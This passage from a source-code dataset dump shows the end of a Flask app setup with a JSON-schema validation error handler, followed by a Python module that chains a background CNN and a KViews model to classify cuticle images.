app = Flask(__name__)
app.config.update(Config or {})
init_logging(app)
Swagger(app)
@app.errorhandler(jsonschema.ValidationError)
def handle_bad_request(e):
return make_response(jsonify(code=400,
message=e.schema.get('error', '参数校验错误'),
details=e.message,
schema=str(e.schema)), 200)
from sample.api import api
app.register_blueprint(api, url_prefix='/api/v123456')
if __name__=='__main__':
app.run() | 25.409091 | 77 | 0.675313 |
c94abc02ec26c5e120241965ee1760edb37aa362 | 909 | py | Python | cuticle_analysis/models/e2e.py | ngngardner/cuticle_analysis | 7ef119d9ee407df0faea63705dcea76d9f42614b | [
"MIT"
] | null | null | null | cuticle_analysis/models/e2e.py | ngngardner/cuticle_analysis | 7ef119d9ee407df0faea63705dcea76d9f42614b | [
"MIT"
] | 4 | 2021-07-02T17:49:44.000Z | 2021-09-27T01:06:41.000Z | cuticle_analysis/models/e2e.py | ngngardner/cuticle_analysis | 7ef119d9ee407df0faea63705dcea76d9f42614b | [
"MIT"
] | null | null | null |
import numpy as np
from .cnn import CNN
from .kviews import KViews
from .. import const
class EndToEnd():
def __init__(
self,
bg_model: CNN,
rs_model: KViews
) -> None:
self.name = 'EndToEnd'
self.bg_model = bg_model
self.rs_model = rs_model
def metadata(self):
return self.bg_model.metadata() + self.rs_model.metadata()
def predict(self, image: np.ndarray) -> np.ndarray:
# first find background
preds = self.bg_model.predict(image)
# cuticle detected, so use rs_model
if preds.any() == const.BG_LABEL_MAP['cuticle']:
idx = np.where(preds == 1)
rs_preds = self.rs_model.predict(image[idx])
# remap (0, 1) to (1, 2)
mp = {0: 1, 1: 2}
rs_preds = np.array([mp[i] for i in rs_preds])
preds[idx] = rs_preds
return preds
| 24.567568 | 66 | 0.567657 |